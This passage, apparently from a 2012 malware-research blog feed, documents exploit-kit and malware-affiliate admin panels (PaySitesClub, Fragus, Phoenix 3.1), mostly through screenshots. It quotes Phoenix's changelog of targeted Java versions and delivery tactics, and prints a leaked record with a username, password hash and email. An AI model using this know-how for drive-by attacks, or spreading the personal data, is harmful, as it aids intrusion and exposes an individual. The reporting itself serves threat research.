href="http://xylibox.blogspot.fr/2011/07/trojanmbrlock-xxxvideoaviexe_10.html"&gt;MBRlock&lt;/a&gt; earlier back in 2011.&lt;br /&gt;&lt;br /&gt;cf jsunpack: &lt;a href="http://jsunpack.jeek.org/dec/getfile?hash=4ca9/03a571c56f1207e9398a0db5eb3a453b77d5"&gt;http://jsunpack.jeek.org/dec/getfile?hash=4ca9/03a571c56f1207e9398a0db5eb3a453b77d5&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-wqbGYnP-7Hc/T6Y8lWYmOaI/AAAAAAAAF4Y/dioosSVuC18/s1600/code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-wqbGYnP-7Hc/T6Y8lWYmOaI/AAAAAAAAF4Y/dioosSVuC18/s400/code.png" width="397" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Even in one of my old 2011 post, here is a screenshots of a domain with the template of SexDerevo.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-lt7sHMvaHEY/T6Y9jg77KqI/AAAAAAAAF4g/vUfFhhyyanY/s1600/06-05-2012+10-59-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-lt7sHMvaHEY/T6Y9jg77KqI/AAAAAAAAF4g/vUfFhhyyanY/s400/06-05-2012+10-59-31.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Malware domains are sometime recycled in porn and months later, exploits and fake scanners are back.&lt;br /&gt;recycling domains is not a new method, example here:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-fJHMpMrLmgg/T6Z9Br0zmDI/AAAAAAAAF6w/B09Z9jXKiYc/s1600/06-05-2012+15-30-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="117" src="http://2.bp.blogspot.com/-fJHMpMrLmgg/T6Z9Br0zmDI/AAAAAAAAF6w/B09Z9jXKiYc/s400/06-05-2012+15-30-01.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;Blackhole, Winlock, 0Access, PWS... you have the choice.&lt;br /&gt;&lt;br /&gt;PaySitesClub Advert:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-YfxPDyKjnyA/T6Y4fw9WVYI/AAAAAAAAF4M/VaeiZbtIUoE/s1600/06-05-2012+10-38-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="305" src="http://3.bp.blogspot.com/-YfxPDyKjnyA/T6Y4fw9WVYI/AAAAAAAAF4M/VaeiZbtIUoE/s400/06-05-2012+10-38-01.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Login:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-sLtXUq8PrbU/T6Y1bT74WQI/AAAAAAAAF20/J3FhZDL-pYQ/s1600/1.login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-sLtXUq8PrbU/T6Y1bT74WQI/AAAAAAAAF20/J3FhZDL-pYQ/s400/1.login.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Statistics:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-6zJb3nuoXeU/T6Y1hoBcRpI/AAAAAAAAF28/v3X-k2tnF0E/s1600/2.stats.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-6zJb3nuoXeU/T6Y1hoBcRpI/AAAAAAAAF28/v3X-k2tnF0E/s400/2.stats.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Invites:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Nsl-iSMIE9c/T6Y1rQP41uI/AAAAAAAAF3E/B-kOwfwDaRY/s1600/invite.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-Nsl-iSMIE9c/T6Y1rQP41uI/AAAAAAAAF3E/B-kOwfwDaRY/s400/invite.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Subaccounts:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-O1OmMThVmTI/T6Y1xY_mRQI/AAAAAAAAF3M/WUyRNa9ahsQ/s1600/subaccount.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-O1OmMThVmTI/T6Y1xY_mRQI/AAAAAAAAF3M/WUyRNa9ahsQ/s400/subaccount.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;News/About: (funny things, they asked Kaspersky to remove detections of 7xtube and 7xvideo)&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;21.03.2012 - Уважаемые партнёры, с доменов 7xtube.com и 7xvideo.com сняты все санкции антивируса Kaspersky. Мы как всегда очень оперативно решили проблему!&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-_WT2PoZhbwQ/T6Y14_2WIrI/AAAAAAAAF3U/Tkz-n425VF8/s1600/3.news.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-_WT2PoZhbwQ/T6Y14_2WIrI/AAAAAAAAF3U/Tkz-n425VF8/s400/3.news.png" width="296" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Sites:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-9V5H1fLbvKk/T6Y3SlF3ajI/AAAAAAAAF38/OfBIsvtg4E0/s1600/4.sites.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-9V5H1fLbvKk/T6Y3SlF3ajI/AAAAAAAAF38/OfBIsvtg4E0/s400/4.sites.png" width="367" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Profile:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Wocl6URw120/T6Y3bWpD8DI/AAAAAAAAF4E/HJiQ2N1srx4/s1600/5.profile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-Wocl6URw120/T6Y3bWpD8DI/AAAAAAAAF4E/HJiQ2N1srx4/s400/5.profile.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Active subscriptions:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-WKUt6qgduZU/T6Y2T3VNXdI/AAAAAAAAF3k/hLaraypHIBo/s1600/6.active+subscriptions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-WKUt6qgduZU/T6Y2T3VNXdI/AAAAAAAAF3k/hLaraypHIBo/s400/6.active+subscriptions.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Last SMS:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-XChcbiu-LmA/T6Y26IU5U2I/AAAAAAAAF3s/ysMltLnE-Qs/s1600/7.last.sms.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="365" src="http://2.bp.blogspot.com/-XChcbiu-LmA/T6Y26IU5U2I/AAAAAAAAF3s/ysMltLnE-Qs/s400/7.last.sms.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Last numbers:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-lYRJDrpmtTg/T6Y3C49bHnI/AAAAAAAAF30/tCKHk75y_zQ/s1600/8.last.numbers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-lYRJDrpmtTg/T6Y3C49bHnI/AAAAAAAAF30/tCKHk75y_zQ/s400/8.last.numbers.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-5501254446685370410?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/05/paysitesclub-affiliate-recycle-malware.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-wqbGYnP-7Hc/T6Y8lWYmOaI/AAAAAAAAF4Y/dioosSVuC18/s72-c/code.png" height="72" width="72" /><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-765381563052637014</guid><pubDate>Fri, 04 May 2012 15:51:00 +0000</pubDate><atom:updated>2012-05-05T10:28:07.897+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Exploit</category><category domain="http://www.blogger.com/atom/ns#">Fragus Exploit Kit</category><category domain="http://www.blogger.com/atom/ns#">Fragus</category><category domain="http://www.blogger.com/atom/ns#">exploit kit</category><title>Fragus exploit kit</title><description>Advert:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-YXPOYokhHSM/T6PjC9UJ-EI/AAAAAAAAF2A/WsFqhTFA0qY/s1600/04-05-2012+16-07-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-YXPOYokhHSM/T6PjC9UJ-EI/AAAAAAAAF2A/WsFqhTFA0qY/s400/04-05-2012+16-07-41.png" width="266" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-qoHcnszxW2E/T6PjepoZ5jI/AAAAAAAAF2I/NAebQyjdc3s/s1600/04-05-2012+16-10-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="278" src="http://1.bp.blogspot.com/-qoHcnszxW2E/T6PjepoZ5jI/AAAAAAAAF2I/NAebQyjdc3s/s400/04-05-2012+16-10-14.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Visual map:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-uxz_Ar4qQWg/T6P5TaQLayI/AAAAAAAAF2Y/-EHmQk1Cjc4/s1600/fragus-visual.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="226" src="http://1.bp.blogspot.com/-uxz_Ar4qQWg/T6P5TaQLayI/AAAAAAAAF2Y/-EHmQk1Cjc4/s400/fragus-visual.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Login:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-sFC6BT63KOk/T6PZRV5J80I/AAAAAAAAF1I/1xPqhoG2NJw/s1600/1.login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-sFC6BT63KOk/T6PZRV5J80I/AAAAAAAAF1I/1xPqhoG2NJw/s400/1.login.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Statistics:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-GMC5Z30jqEw/T6PZWLcCWMI/AAAAAAAAF1Q/N2U8jtYCvbc/s1600/2.statistics.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="316" src="http://1.bp.blogspot.com/-GMC5Z30jqEw/T6PZWLcCWMI/AAAAAAAAF1Q/N2U8jtYCvbc/s400/2.statistics.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Files:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-LsE4n2xhhTc/T6PZbmUWbtI/AAAAAAAAF1Y/4t2Ddv0lWCU/s1600/2.files.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-LsE4n2xhhTc/T6PZbmUWbtI/AAAAAAAAF1Y/4t2Ddv0lWCU/s400/2.files.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Sellers:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Jdrlg1nbPkI/T6PZgYb3m8I/AAAAAAAAF1g/qMZZ9Gq-240/s1600/4.seller.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-Jdrlg1nbPkI/T6PZgYb3m8I/AAAAAAAAF1g/qMZZ9Gq-240/s400/4.seller.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Preferences:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-6dwQx0BRKj4/T6PZlEf0GlI/AAAAAAAAF1o/4CQKxjLOI4A/s1600/5.preferences.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-6dwQx0BRKj4/T6PZlEf0GlI/AAAAAAAAF1o/4CQKxjLOI4A/s400/5.preferences.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;And clicking "Traffic links" lead the server to error 500 ¬_¬&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-O5DUMyuX37g/T6PemiBCwzI/AAAAAAAAF10/22h7lm5kKdg/s1600/fragus_lol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="287" src="http://2.bp.blogspot.com/-O5DUMyuX37g/T6PemiBCwzI/AAAAAAAAF10/22h7lm5kKdg/s400/fragus_lol.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-765381563052637014?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/05/fragus-exploit-kit.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-YXPOYokhHSM/T6PjC9UJ-EI/AAAAAAAAF2A/WsFqhTFA0qY/s72-c/04-05-2012+16-07-41.png" height="72" width="72" /><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-5045045062293925143</guid><pubDate>Tue, 01 May 2012 16:44:00 +0000</pubDate><atom:updated>2012-05-01T18:44:19.296+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Phoenix</category><category domain="http://www.blogger.com/atom/ns#">Java Atomic</category><category domain="http://www.blogger.com/atom/ns#">Phoenix Exploit Kit 3.1</category><category domain="http://www.blogger.com/atom/ns#">Phoenix Exploit Kit</category><category domain="http://www.blogger.com/atom/ns#">java rhino</category><category domain="http://www.blogger.com/atom/ns#">Exploit</category><category domain="http://www.blogger.com/atom/ns#">Kit</category><title>Phoenix Exploit's Kit 3.1 full</title><description>3.1 changelog in Russian:&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-bVIxViCWEqY/T5uUbbCXjuI/AAAAAAAAFyM/qe6Q1wex4Q8/s1600/alexudakov.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="201" src="http://2.bp.blogspot.com/-bVIxViCWEqY/T5uUbbCXjuI/AAAAAAAAFyM/qe6Q1wex4Q8/s400/alexudakov.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Java Web Start 2012 exploit:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-E5IhFOxH_Hs/T5uwGzYUFHI/AAAAAAAAFzE/QL35MbSM5Kc/s1600/java.web.start.2012.exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="115" src="http://4.bp.blogspot.com/-E5IhFOxH_Hs/T5uwGzYUFHI/AAAAAAAAFzE/QL35MbSM5Kc/s400/java.web.start.2012.exploit.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-Cb_LdnHiz0o/T5uzmdsTweI/AAAAAAAAFzU/I-GKdwGf00M/s1600/files.png" /&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;Schem about alexudakov (not really searched)&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-oe1Zt1ECbHI/T5uyfZWOGsI/AAAAAAAAFzM/pJ8Htnu8FTo/s1600/icq.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="328" src="http://4.bp.blogspot.com/-oe1Zt1ECbHI/T5uyfZWOGsI/AAAAAAAAFzM/pJ8Htnu8FTo/s400/icq.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;3.1 changelog translated by EP_X0FF &lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;We are pleased to present new version of pack 3.1!&lt;br /&gt;&lt;br /&gt;-----------v3.1------------------------------------&lt;br /&gt;&lt;br /&gt;[+]Added new JAVA ATOMIC exploit of JRE 1.6.0-1.6.0_30, 1.7.0-1.7.0_2 for FF/IE/OPERA. Sufficiently increased exploitation success.&lt;br /&gt;&lt;br /&gt;[+]JAVA TC and JAVA RHINO combined in one .jar file&lt;br /&gt;&lt;br /&gt;[+]added 4 activation variants:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1)JAVA with version determination, PDF with version determination before load&lt;br /&gt;2)JAVA without version determination, PDF with version determination before load&lt;br /&gt;3)JAVA with version determination, PDF without version determination before load&lt;br /&gt;4)JAVA without version determination, PDF with version determination before load&lt;br /&gt;&lt;br /&gt;This flexible system allows for longer not to kill traffic sources (actual for iframe traffic) or conversely with little sacrifice of traffic sources raise exploitation success (actual for Pop up traffic)&lt;br /&gt;&lt;br /&gt;[+]The exploits delivery chain has been rewritten to be up to date, has been removed JAVA SMB, JAVA TRUST, FLASH 10 because they are no longer actual. As a consequence, there was easy to configure and install - no-Apache on port 8080 and SMB configs.&lt;/div&gt;&lt;br /&gt;Login:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-FCdBAHxxMIE/T5vbTPrAVFI/AAAAAAAAFzg/X3QG-j4nuYM/s1600/login.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-FCdBAHxxMIE/T5vbTPrAVFI/AAAAAAAAFzg/X3QG-j4nuYM/s400/login.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Simple statistics:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-c_eDSyEGZjI/T5vbYF-0MYI/AAAAAAAAFzo/LzKl7JvAgRs/s1600/dashboard.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-c_eDSyEGZjI/T5vbYF-0MYI/AAAAAAAAFzo/LzKl7JvAgRs/s400/dashboard.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Advenced statistics:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-XCDp3OgHqOU/T5vbdhuZAxI/AAAAAAAAFzw/7QM9yQcBFo8/s1600/advenced-stat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-XCDp3OgHqOU/T5vbdhuZAxI/AAAAAAAAFzw/7QM9yQcBFo8/s400/advenced-stat.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&amp;nbsp;Countries statistics:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-2Q7JEZZklf0/T5vbiK7EiGI/AAAAAAAAFz4/qF_GMZ56R9Y/s1600/country-stat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-2Q7JEZZklf0/T5vbiK7EiGI/AAAAAAAAFz4/qF_GMZ56R9Y/s400/country-stat.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Referers statistics:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-ZOxDzG3PCjM/T5vbmnMGSqI/AAAAAAAAF0A/99t7Ix79dQs/s1600/referrer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="306" src="http://4.bp.blogspot.com/-ZOxDzG3PCjM/T5vbmnMGSqI/AAAAAAAAF0A/99t7Ix79dQs/s400/referrer.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Sources statistics:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-MKqGswZXKtM/T5vbrVJ6gxI/AAAAAAAAF0I/YoSQUIQivzM/s1600/sources-stats.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-MKqGswZXKtM/T5vbrVJ6gxI/AAAAAAAAF0I/YoSQUIQivzM/s400/sources-stats.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Clear statistics:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-MpDCmqh4Wqw/T5vbwXBN47I/AAAAAAAAF0Q/zEwRMlHGydg/s1600/clear-stat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-MpDCmqh4Wqw/T5vbwXBN47I/AAAAAAAAF0Q/zEwRMlHGydg/s400/clear-stat.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Upload .exe:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-xjTNP5S95Mw/T5vb2KX9enI/AAAAAAAAF0Y/gMX8WJv82do/s1600/upload-a-file.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-xjTNP5S95Mw/T5vb2KX9enI/AAAAAAAAF0Y/gMX8WJv82do/s400/upload-a-file.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Dumped files, CVE-2010-0094 detected as Blacole.FK by MSE.  &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-SXHVqUuwdCs/T5uSzOQoyBI/AAAAAAAAFyE/EAUUZ64SnNY/s1600/phoenixfiles.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="340" src="http://3.bp.blogspot.com/-SXHVqUuwdCs/T5uSzOQoyBI/AAAAAAAAFyE/EAUUZ64SnNY/s400/phoenixfiles.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Phoenix landing:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-sZ-AFRe-GYM/T5uVdnJSBtI/AAAAAAAAFyU/a_wK6xdMJQ4/s1600/landing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="87" src="http://3.bp.blogspot.com/-sZ-AFRe-GYM/T5uVdnJSBtI/AAAAAAAAFyU/a_wK6xdMJQ4/s400/landing.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Part of the code, looking for the os version&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/--7O1cU9tXTk/T5uXrNXmiLI/AAAAAAAAFyc/49TkHk-ipf4/s1600/part.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="393" src="http://3.bp.blogspot.com/--7O1cU9tXTk/T5uXrNXmiLI/AAAAAAAAFyc/49TkHk-ipf4/s400/part.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Welcome to our show... hack the planet&lt;br /&gt;&lt;div class="sql" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;`id`&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;`user_name`&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;`pass_hash`&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;`money`&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;`activated`&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;VALUES&lt;/span&gt; &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;'588'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'alexudakov'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'d8228ee30f409166ff72ecf6642ad9fc'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'0.00'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'0'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;`user_id`&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;`icq`&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;`email`&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: #993333; font-weight: bold;"&gt;VALUES&lt;/span&gt; &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: red;"&gt;'588'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;''&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;,&lt;/span&gt; &lt;span style="color: red;"&gt;'andrey89@nextmail.ru'&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-FEjn3WPaTbM/T5unlE31OEI/AAAAAAAAFy0/42Lir2WhvDs/s1600/Imma+pirate+ALL+THE+THINGS%21_1331448881573.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="225" src="http://4.bp.blogspot.com/-FEjn3WPaTbM/T5unlE31OEI/AAAAAAAAFy0/42Lir2WhvDs/s400/Imma+pirate+ALL+THE+THINGS%21_1331448881573.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-5045045062293925143?l=www.xylibox.com' alt='' 